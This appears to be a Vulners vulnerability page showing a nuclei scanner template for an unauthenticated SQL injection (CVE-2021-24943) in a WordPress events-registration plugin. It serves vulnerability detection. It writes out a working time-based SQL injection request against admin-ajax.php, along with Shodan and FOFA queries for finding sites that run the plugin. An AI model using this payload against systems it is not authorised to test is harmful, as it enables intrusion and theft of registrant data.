Lucene search
K

Registrations for the Events Calendar < 2.7.6 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 43 Views

The Registrations for the Events Calendar WordPress plugin before 2.7.6 is vulnerable to unauthenticated SQL injection via the event_id parameter in the rtec_send_unregister_link AJAX action

Related
Refs
Code
id: CVE-2021-24943

info:
  name: Registrations for the Events Calendar < 2.7.6 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.
  impact: |
    Unauthenticated attackers can execute SQL injection through the event_id parameter, potentially extracting all Events Calendar registration data including attendee information.
  remediation: Fixed in 2.7.6
  reference:
    - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24943
    - https://wordpress.org/plugins/registrations-for-the-events-calendar/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24943
    cwe-id: CWE-89
    epss-score: 0.07474
    epss-percentile: 0.9373
    cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: roundupwp
    product: registrations_for_the_events_calendar
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/
    fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/
    publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp,vkev,vuln
variables:
  text: "{{rand_base(5)}}"

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(body, "Please enter the email you registered with")'
        condition: and
# digest: 4a0a004730450220735bffdd47451384f7635f0e2c36469b13a09bbd7d4810270d74bf7860418f7e022100b97c488bb54b4c9a3be2a846567d422b1b9de350abd2ac5a7c222a8c2218c137:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.5
CVSS 3.19.8
EPSS0.07474
43